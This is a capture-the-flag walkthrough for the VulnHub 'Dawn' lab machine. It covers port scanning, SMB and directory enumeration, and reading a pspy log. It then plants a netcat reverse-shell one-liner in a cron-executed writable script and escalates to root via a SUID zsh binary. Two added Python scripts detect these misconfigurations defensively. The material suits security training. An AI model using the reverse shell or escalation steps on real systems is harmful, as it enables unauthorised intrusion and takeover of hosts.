VulnHub target machine


2023-09-04 10:19 | Source: compiled from the web | Views: 265

1. Find the target's IP: 192.168.0.123

nmap 192.168.0.0/24

2. Scan the target's ports

root@kali:~# nmap -A -p- 192.168.0.123
Starting Nmap 7.80 ( https://nmap.org )
Nmap scan report for 192.168.0.123
Host is up (0.0090s latency).
Not shown: 65531 closed ports
PORT     STATE SERVICE     VERSION
80/tcp   open  http        Apache httpd 2.4.38 ((Debian))
|_http-server-header: Apache/2.4.38 (Debian)
|_http-title: Site doesn't have a title (text/html).
139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open  netbios-ssn Samba smbd 4.9.5-Debian (workgroup: WORKGROUP)
3306/tcp open  mysql       MySQL 5.5.5-10.3.15-MariaDB-1
| mysql-info:
|   Protocol: 10
|   Version: 5.5.5-10.3.15-MariaDB-1
|   Thread ID: 14
|   Capabilities flags: 63486
|   Some Capabilities: LongColumnFlag, Support41Auth, FoundRows, InteractiveClient, SupportsTransactions, Speaks41ProtocolOld, ODBCClient, Speaks41ProtocolNew, IgnoreSigpipes, DontAllowDatabaseTableColumn, SupportsCompression, SupportsLoadDataLocal, IgnoreSpaceBeforeParenthesis, ConnectWithDatabase, SupportsAuthPlugins, SupportsMultipleResults, SupportsMultipleStatments
|   Status: Autocommit
|   Salt: _R`iqz3,"dUZC$'7{-iL
|_  Auth Plugin Name: mysql_native_password
MAC Address: 08:00:27:45:9B:22 (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: Host: DAWN

Host script results:
|_clock-skew: mean: 1h19m59s, deviation: 2h18m34s, median: -1s
|_nbstat: NetBIOS name: DAWN, NetBIOS user: , NetBIOS MAC: (unknown)
| smb-os-discovery:
|   OS: Windows 6.1 (Samba 4.9.5-Debian)
|   Computer name: dawn
|   NetBIOS computer name: DAWN\x00
|   Domain name: dawn
|   FQDN: dawn.dawn
|_  System time: 2020-07-16T06:39:06-04:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2020-07-16T10:39:06
|_  start_date: N/A

TRACEROUTE
HOP RTT     ADDRESS
1   8.97 ms 192.168.0.123

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.80 seconds

3. Visit port 80; the home page shows nothing useful.

4. Set that aside and look at port 445 directly (port 139 is only used as a fallback when the 445 connection fails). Connect over SMB; there are two ways.

Method one: connect from the command line

Port 445

root@kali:~# smbclient -L //192.168.0.123
Enter WORKGROUP\root's password:

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        ITDEPT          Disk      PLEASE DO NOT REMOVE THIS SHARE. IN CASE YOU ARE NOT AUTHORIZED TO USE THIS SYSTEM LEAVE IMMEADIATELY.
        IPC$            IPC       IPC Service (Samba 4.9.5-Debian)
SMB1 disabled -- no workgroup available
root@kali:~# smbclient //192.168.0.123/ITDEPT
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Sat Aug  3 11:23:20 2019
  ..                                  D        0  Sat Aug  3 11:21:39 2019

                7158264 blocks of size 1024. 3387808 blocks available
smb: \>

The share is empty.

Method two: connect through the file manager GUI

Port 445

Leave this for now and go back to port 80.

5. Scan for directories

root@kali:~# gobuster dir --url http://192.168.0.123/ --wordlist /usr/share/wordlists/dirb/big.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://192.168.0.123/
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirb/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/07/16 18:49:32 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/cctv (Status: 301)
/logs (Status: 301)
/server-status (Status: 403)
===============================================================
Finished
===============================================================
root@kali:~#

/cctv returns 403.

/logs lists four log files.

The first three return 403.

The last one is readable; a few of the important entries are picked out here.

2020/07/15 21:48:27 CMD: UID=0    PID=462    | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log

pspy64 is the tool we used earlier to watch background processes, so this file is a record of the processes running in the background; it is run every minute.

2020/07/16 07:13:02 CMD: UID=0    PID=2034   | chmod 777 /home/dawn/ITDEPT/product-control
2020/07/16 07:14:01 CMD: UID=???  PID=2050   | chmod 777 /home/dawn/ITDEPT/product-control

ITDEPT is the folder behind the SMB share we saw earlier; every minute the product-control file is given 777 permissions.

2020/07/15 21:53:01 CMD: UID=1000 PID=983    | /bin/sh -c /home/dawn/ITDEPT/product-control
2020/07/15 21:54:01 CMD: UID=1000 PID=1015   | /bin/sh -c /home/dawn/ITDEPT/product-control

It is executed every minute.

2020/07/15 21:54:01 CMD: UID=0    PID=1014   | chmod 777 /home/dawn/ITDEPT/web-control
2020/07/15 21:55:01 CMD: UID=0    PID=1026   | chmod 777 /home/dawn/ITDEPT/web-control
2020/07/15 21:55:01 CMD: UID=33   PID=1031   | /bin/sh -c /home/dawn/ITDEPT/web-control
2020/07/15 21:56:02 CMD: UID=33   PID=1046   | /bin/sh -c /home/dawn/ITDEPT/web-control

web-control behaves exactly like product-control above: every minute it is given 777 permissions, and every minute it is run.
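The pattern the log exposes (a scheduled job that makes a script world-writable and another job that executes it) is something a defender can pull out of pspy output automatically. The following Python is an added example, not part of the original write-up; the regexes assume pspy's `CMD: UID=... PID=... | ...` line format, and the sample log is constructed from the entries quoted above with the colour codes removed.

```python
import re
from collections import defaultdict

# pspy line: "2020/07/15 21:53:01 CMD: UID=1000 PID=983    | /bin/sh -c /path"
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}/\d{2}/\d{2} \d{2}:\d{2}:\d{2}) CMD: UID=(?P<uid>\S+)\s+PID=(?P<pid>\d+)\s+\| (?P<cmd>.*)$"
)
CHMOD_RE = re.compile(r"^chmod\s+(?P<mode>[0-7]{3,4})\s+(?P<path>\S+)$")
EXEC_RE = re.compile(r"^/bin/sh -c (?P<path>\S+)$")  # script run directly, no redirection

# Constructed sample: the entries quoted from management.log on this page.
SAMPLE_LOG = """\
2020/07/15 21:48:27 CMD: UID=0    PID=462    | /bin/sh -c /root/pspy64 > /var/www/html/logs/management.log
2020/07/16 07:13:02 CMD: UID=0    PID=2034   | chmod 777 /home/dawn/ITDEPT/product-control
2020/07/16 07:14:01 CMD: UID=???  PID=2050   | chmod 777 /home/dawn/ITDEPT/product-control
2020/07/15 21:53:01 CMD: UID=1000 PID=983    | /bin/sh -c /home/dawn/ITDEPT/product-control
2020/07/15 21:54:01 CMD: UID=0    PID=1014   | chmod 777 /home/dawn/ITDEPT/web-control
2020/07/15 21:55:01 CMD: UID=33   PID=1031   | /bin/sh -c /home/dawn/ITDEPT/web-control
""".splitlines()

def parse(lines):
    """Yield one dict per well-formed pspy line; ignore anything else."""
    for line in lines:
        m = LINE_RE.match(line.strip())
        if m:
            yield m.groupdict()

def world_writable(mode):
    """True if the numeric chmod mode sets the 'other write' bit (the last octal digit has 2)."""
    return int(mode[-3:], 8) & 0o002 != 0

def find_writable_scheduled_scripts(lines):
    """Return {path: {'chmod_uids': set, 'exec_uids': set}} for every path that is
    both made world-writable by some command and executed via /bin/sh -c by another.
    Anyone able to write to such a path gets code execution as each UID in exec_uids."""
    chmods, execs = defaultdict(set), defaultdict(set)
    for ev in parse(lines):
        cm = CHMOD_RE.match(ev["cmd"])
        if cm and world_writable(cm["mode"]):
            chmods[cm["path"]].add(ev["uid"])
            continue
        em = EXEC_RE.match(ev["cmd"])
        if em:
            execs[em["path"]].add(ev["uid"])
    return {p: {"chmod_uids": chmods[p], "exec_uids": execs[p]} for p in chmods if p in execs}

if __name__ == "__main__":
    for path, info in find_writable_scheduled_scripts(SAMPLE_LOG).items():
        print(f"{path}: chmod by UID {sorted(info['chmod_uids'])}, executed by UID {sorted(info['exec_uids'])}")
```

The pspy64 line is not flagged because the script path is followed by a redirection, so only scripts that are run as-is are reported; the fix on the host is to remove the `chmod 777` job and give the scripts a root-owned, non-writable mode.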

Pick one of the two files to use (I chose product-control): create the file locally, write a reverse-shell one-liner into it, start a listener locally, connect over SMB and upload the file to the target.

root@kali:~# echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.107 4444 >/tmp/f' >product-control

6. sudo -l shows that mysql can be run as root without a password; use python to spawn a proper tty.

$ sudo -l
Matching Defaults entries for dawn on dawn:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User dawn may run the following commands on dawn:
    (root) NOPASSWD: /usr/bin/mysql
$ python -c 'import pty;pty.spawn("/bin/bash")'
dawn@dawn:~$

7. I wanted to escalate through the mysql command, but I did not know the password, and after too many failed attempts it refused further connections, so another route was needed: search for binaries with the SUID bit. zsh shows up, a ready-made shell; running it gives root, and with it the flag.

dawn@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
dawn@dawn:~$ zsh
zsh
dawn# whoami
whoami
root
dawn# cd /root
cd /root
dawn# ls
ls
flag.txt  pspy64
dawn# cat flag.txt
cat flag.txt
Hello! whitecr0wz here. I would like to congratulate and thank you for finishing the ctf, however, there is another way of getting a shell(very similar though). Also, 4 other methods are available for rooting this box!

flag{3a3e52f0a6af0d6e36d7c1ced3a9fd59}
dawn#
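The `find / -perm -4000` listing is also what a hardening check should run regularly, comparing each result against a baseline and treating any setuid shell or interpreter as a finding. The Python below is an added example and not part of the original write-up; its baseline is constructed from the legitimate entries in the listing above (your own should come from a known-good host of the same release), and the sample input is the listing as shown on the page.

```python
import os

# Constructed baseline: the setuid binaries from the listing that a stock Debian
# install legitimately ships. Illustrative only; derive yours from a known-good host.
BASELINE = {
    "/usr/sbin/mount.cifs", "/usr/lib/dbus-1.0/dbus-daemon-launch-helper",
    "/usr/lib/policykit-1/polkit-agent-helper-1", "/usr/lib/eject/dmcrypt-get-device",
    "/usr/lib/openssh/ssh-keysign", "/usr/bin/su", "/usr/bin/newgrp", "/usr/bin/pkexec",
    "/usr/bin/passwd", "/usr/bin/sudo", "/usr/bin/mount", "/usr/bin/gpasswd",
    "/usr/bin/chsh", "/usr/bin/umount", "/usr/bin/chfn",
}
# A setuid bit on any shell or interpreter hands a root shell to every local user.
SHELLS = {"sh", "bash", "dash", "zsh", "ksh", "csh", "tcsh", "fish", "python", "perl", "ruby"}
SYSTEM_DIRS = ("/usr/bin/", "/usr/sbin/", "/usr/lib/", "/bin/", "/sbin/")

# Constructed sample: the find output quoted on this page, echoed command line included.
SAMPLE_FIND = """\
dawn@dawn:~$ find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null
/usr/sbin/mount.cifs
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/su
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/passwd
/usr/bin/sudo
/usr/bin/mount
/usr/bin/zsh
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/umount
/usr/bin/chfn
/home/dawn/ITDEPT
"""

def classify(path):
    """Verdict for one setuid path; checks are ordered from most to least severe."""
    name = os.path.basename(path)
    if name in SHELLS or name.rstrip("0123456789.") in SHELLS:  # python3.7 -> python
        return "CRITICAL: setuid shell or interpreter"
    if not path.startswith(SYSTEM_DIRS):
        return "HIGH: setuid file outside system directories"
    if path not in BASELINE:
        return "REVIEW: not in baseline"
    return "ok"

def audit(find_output):
    """Map every path in find output to its verdict, skipping prompts and echoed commands."""
    return {l.strip(): classify(l.strip()) for l in find_output.splitlines() if l.strip().startswith("/")}

def findings(find_output):
    """Only the entries that need attention."""
    return {p: v for p, v in audit(find_output).items() if v != "ok"}
```

On this host the check reports /usr/bin/zsh as critical and /home/dawn/ITDEPT as outside the system directories; the remediation is `chmod u-s` on the former and investigating why the latter carries the bit at all.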

